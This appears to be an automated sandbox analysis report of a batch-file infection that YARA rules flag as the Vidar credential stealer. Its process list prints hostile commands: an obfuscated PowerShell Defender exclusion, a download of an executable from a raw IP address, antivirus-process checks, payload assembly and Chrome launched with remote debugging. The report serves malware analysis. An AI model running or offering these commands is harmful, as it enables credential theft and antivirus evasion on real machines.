                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:15 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726f37ceede94-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom(A)


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            51192.168.2.650093162.159.61.3443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            2024-12-27 06:11:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                            2024-12-27 06:11:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:15 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                            CF-RAY: 8f8726f3c8b0de92-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-27 06:11:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2b 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom+A)


                                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                                            Start time:01:09:06
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" "
                                                                                                                                                                                                                                                                            Imagebase:0x7ff784bd0000
                                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                                            Start time:01:09:06
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                                            Start time:01:09:07
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                                                                                                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                                            Start time:01:09:12
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                            Imagebase:0x7ff717f30000
                                                                                                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                                            Start time:01:09:18
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:timeout /t 10 /nobreak
                                                                                                                                                                                                                                                                            Imagebase:0x7ff60de80000
                                                                                                                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                                            Start time:01:09:28
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                                                                                                                                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                                            Start time:01:09:40
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                            Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                                            Start time:01:09:43
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\putt.exe"
                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                            File size:1'273'852 bytes
                                                                                                                                                                                                                                                                            MD5 hash:5782BEA403267E4A6DDF82263332ED59
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                            • Detection: 5%, ReversingLabs
                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                                            Start time:01:09:44
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                                                                                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                                            Start time:01:09:44
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                                            Start time:01:09:47
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                                                            Imagebase:0xcb0000
                                                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                                            Start time:01:09:47
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                            Imagebase:0x6d0000
                                                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                                            Start time:01:09:47
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                                                            Imagebase:0xcb0000
                                                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                                            Start time:01:09:47
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                            Imagebase:0x6d0000
                                                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                                            Start time:01:09:49
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:cmd /c md 105235
                                                                                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                                            Start time:01:09:49
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:extrac32 /Y /E Authorization
                                                                                                                                                                                                                                                                            Imagebase:0x910000
                                                                                                                                                                                                                                                                            File size:29'184 bytes
                                                                                                                                                                                                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                                            Start time:01:09:50
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:findstr /V "aid" Division
                                                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                                            Start time:01:09:50
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                                                                                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                                            Start time:01:09:50
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                                                                                                                                                                                                                                                                            Imagebase:0x1c0000
                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                                            Start time:01:09:50
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:Inf.com m
                                                                                                                                                                                                                                                                            Imagebase:0x6f0000
                                                                                                                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                                            Start time:01:09:50
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                            Imagebase:0x5e0000
                                                                                                                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                                            Start time:01:10:48
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                                            Start time:01:10:49
                                                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2332,i,17273091767045928010,3792722135638542356,262144 /prefetch:8
                                                                                                                                                                                                                                                                            Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                            Has exited:true

